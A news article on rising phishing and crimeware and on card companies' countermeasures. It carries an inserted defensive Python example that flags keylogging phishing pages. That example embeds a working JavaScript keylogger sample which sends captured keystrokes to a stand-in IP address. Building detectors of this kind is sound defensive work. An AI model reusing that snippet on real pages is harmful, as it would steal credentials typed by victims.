Card Cos. Combat Rising Tide Of E-Mail Phishing
The practice known as phishing, an e-mail scam in which criminals lure credit-card holders to fraudulent Web sites and steal account information, has more than doubled since late last year, while attempts at online identity theft using virus-like software applications are growing at an even more alarming rate.
In response, several payment firms have launched anti-phishing and fraud-prevention campaigns, in part to educate business travelers about the danger of phishing and the necessity of protecting corporate card numbers.
A total of 14,135 reports of phishing attacks were logged during the month of July by the Anti-Phishing Working Group. By comparison, the global Internet-fraud watchdog logged 6,957 reports in October 2004. The number of reported cases in July of identity theft attempts using phishing-based Trojan horse applications—known as crimeware—was 174, up from 79 in May.
"There has been a profound shift—and we thought it would happen at some point—since the end of last year," said Peter Cassidy, APWG secretary general. "We're seeing an emphasis on automated schemes. Most phishing attacks are based on social-engineering schemes, but more and more of these are automated systems, what we call crimeware, that seek to plant software on a user's machine to automatically retrieve the user's name and password or the user's credentials without the direct deception of the user."
Traditionally, Cassidy said, a victim of a phishing attack receives a fake e-mail designed to look as if it was from a legitimate financial institution or retailer. The e-mail directs the victim to a similarly real-looking Web site, where the victim is asked to provide account information, a password, social security number or other information.
A phishing attack using crimeware, which the APWG classes as a technical subterfuge scheme, uses the same kind of fake e-mail to lead the victim to a Web site that, once rendered in the browser, silently runs a piece of JavaScript that records every keystroke the victim types into the page, including passwords and other account data.
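To make that scheme concrete, here is an added example (not from the article, the APWG or any card company) of how a defender who has fetched a suspect page's HTML can flag the two hallmarks described above: a key-event hook that captures what is typed, and a destination on a host other than the page's own where the captured data is sent. The page HTML, the host name and the beacon address below are constructed for this illustration; real crimeware often obfuscates its script, so treat this pattern matching as first-pass triage rather than proof.

```python
"""Flag the hallmarks of a keystroke-capturing phishing page in fetched HTML."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical host the page was served from (constructed for this example).
PAGE_HOST = "secure-login.example-bank.test"

# Constructed landing page: a real-looking login form plus an inline script
# that records every keystroke and ships the buffer to a third-party address.
SAMPLE_PAGE = """<html><body>
<form action="https://secure-login.example-bank.test/login" method="post">
  <input name="user"><input name="pass" type="password" onkeyup="log(event)">
</form>
<script>
var buf = "";
document.addEventListener("keydown", function (e) { buf += e.key; });
setInterval(function () {
  new Image().src = "http://203.0.113.10/c.gif?k=" + encodeURIComponent(buf);
}, 2000);
</script>
</body></html>"""

# addEventListener('keydown'|'keyup'|'keypress', ...) in script text
KEY_HOOK_RE = re.compile(
    r"addEventListener\s*\(\s*['\"]key(?:down|up|press)['\"]", re.I)
# Absolute URLs assembled inside script text
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


class PageCollector(HTMLParser):
    """Collect inline script bodies, src/action targets and on*key* attributes."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # text of each inline <script>
        self.targets = []      # URLs from src= and action= attributes
        self.key_attrs = []    # (tag, attribute) for inline key handlers
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "action") and value:
                self.targets.append(value)
            if name in ("onkeydown", "onkeyup", "onkeypress"):
                self.key_attrs.append((tag, name))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> content verbatim (CDATA mode)
        if self._in_script:
            self.scripts.append(data)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def analyze_page(html, page_host):
    """Return findings: keystroke hooks and destinations on other hosts."""
    collector = PageCollector()
    collector.feed(html)
    findings = []
    for tag, attr in collector.key_attrs:
        findings.append(f"inline {attr} handler on <{tag}>")
    script_text = "\n".join(collector.scripts)
    if KEY_HOOK_RE.search(script_text):
        findings.append("script registers a document-level key event listener")
    # Every destination the page names: attribute targets plus URLs built in script
    for url in collector.targets + URL_RE.findall(script_text):
        host = _host(url)
        if host and host != page_host.lower():
            findings.append(f"off-host destination {host} ({url})")
    return findings


if __name__ == "__main__":
    for finding in analyze_page(SAMPLE_PAGE, PAGE_HOST):
        print(finding)
```

Run against the constructed page, `analyze_page` reports the inline `onkeyup` handler on the password field, the document-level `keydown` listener, and the beacon to 203.0.113.10 (an address reserved for documentation, used here only as a stand-in); the form's own `action` points at the page host and is not reported. Because the script runs inside the fake page, what it can capture is what the victim types there, which is exactly the credential the form is asking for.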
"We're seeing a lot more of that," Cassidy said. "The increase has been almost 100 percent."
There are several things computer users should do to protect themselves from falling prey to a phishing attack, including installing and using anti-virus, anti-spam and anti-spyware software.
That advice is particularly important to business travelers who use laptop computers while on the road. "I don't know how many times I've seen different tools that come with people's laptops and they've just never turned them on," Cassidy said. "Personal computing hygiene has never been more important. Now, instead of getting an annoying disruption to the service of your computer, you could be robbed of things that are very valuable to you."
If you cannot trust the authenticity of an e-mail you receive, then pick up the phone and call the organization that allegedly sent it, Cassidy said. "It does two things. It prevents you from doing something wrong and it alerts the financial institution or e-commerce trader. Worst-case scenario is they'll tell you, 'That's right. We did send that to you, and we'll read it over the phone. Is this what you got?' Always, when in doubt, make a phone call."
That advice is echoed by major credit card companies that provide detailed information about phishing and fraud prevention on their Web sites. Both Visa and American Express have e-mail addresses for customers to specifically report suspected phishing attacks.
"We approach phishing as a holistic effort that requires consumer education, internal controls, and partnership with law enforcement in order to effectively protect cardmembers," said Kim Forde, American Express public affairs director. "Consumer education is a critical component. It's important that cardmembers understand what phishing is, what to look for, how they can be victimized, and what to do if they suspect something."
Visa's use of its Web site and other means to educate cardholders about phishing has "helped lead to fewer reported incidences of successful attacks on cardholders," said Brad Nightengale, Visa USA vice president of channel management. "While phishers aren't going to stop trying, they are being forced to find other targets and change their targets."
"Visa takes phishing attacks very seriously and has worked aggressively with ISPs to get these sites shut down—often within three hours of detection," Nightengale said. "Visa is focused not just on shutting down phishing sites, but preventing phishing e-mails from ever reaching cardholders."
In February, Visa teamed up with Microsoft and eBay to launch the Phish Report Network, which seeks to collect and share information about phishing attacks. "Subscribers can access the database or receive real-time notifications of known phishing sites, enabling them to protect consumers by blocking those sites in user-facing security applications," Nightengale said.
"Working together, Visa and our member banks have taken a number of steps to anticipate, detect and shut down phishing threats in recent months," he said. "Visa is continually reviewing programs and processes to drive fraud rates lower throughout the payment system."
Similarly, American Express' Forde said, "We monitor the Internet for any potential phishing attempts, as well as for the improper use of AXP card numbers. This practice is not new to us—we have been monitoring the online space for quite some time and phishing is now one additional component we are looking for in this process. Our long-standing partnership with law enforcement allows us to act quickly to identify and help shut down fraudulent sites. We are constantly evolving these techniques to adapt to the changing activities of criminals."
Both Nightengale and Forde declined to offer specifics about fraud detection and prevention measures.
In June 2004, MasterCard International launched Operation Stop IT (identity theft), which works to identify phishing scams and other online fraud via continual monitoring of the Internet. Fraudulent e-mails and Web sites are reported in real time to MasterCard, which in turn informs law enforcement and the relevant ISP. The vast majority of fake Web sites identified by MasterCard have been taken offline within 24 to 48 hours of detection, the firm said.
Thus far, Operation Stop IT has led to the shutdown of more than 1,400 phishing Web sites and more than 700 sites brokering illegally obtained payment card numbers, the firm said.
"The numbers speak to the resounding success. With strong collaborative efforts in place, we are able to take the quick, decisive action that has been integral to our success," Tim Morris, MasterCard International vice president of security and risk management for Asia/Pacific, said in a statement. "Working in partnership with law enforcement, MasterCard continues to be vigilant and press on relentlessly to shut down fraudulent sites."
Several companies recently have fallen victim to a new variation of online fraud known as "spear phishing."
It "involves sending e-mail to employees of a company that is designed to appear as if it comes from an executive within that company," Nightengale said. "The perpetrators of this scheme are after corporate secrets such as passwords and other sensitive data. We have not received any specific reports of spear phishing being used to obtain corporate payment card information, but it is important for companies to make their employees aware of this scheme and to establish policies and procedures to avoid falling victim to it."
"It's an interesting sort of affinity scheme," said APWG's Cassidy. "How do you say no to your CEO?"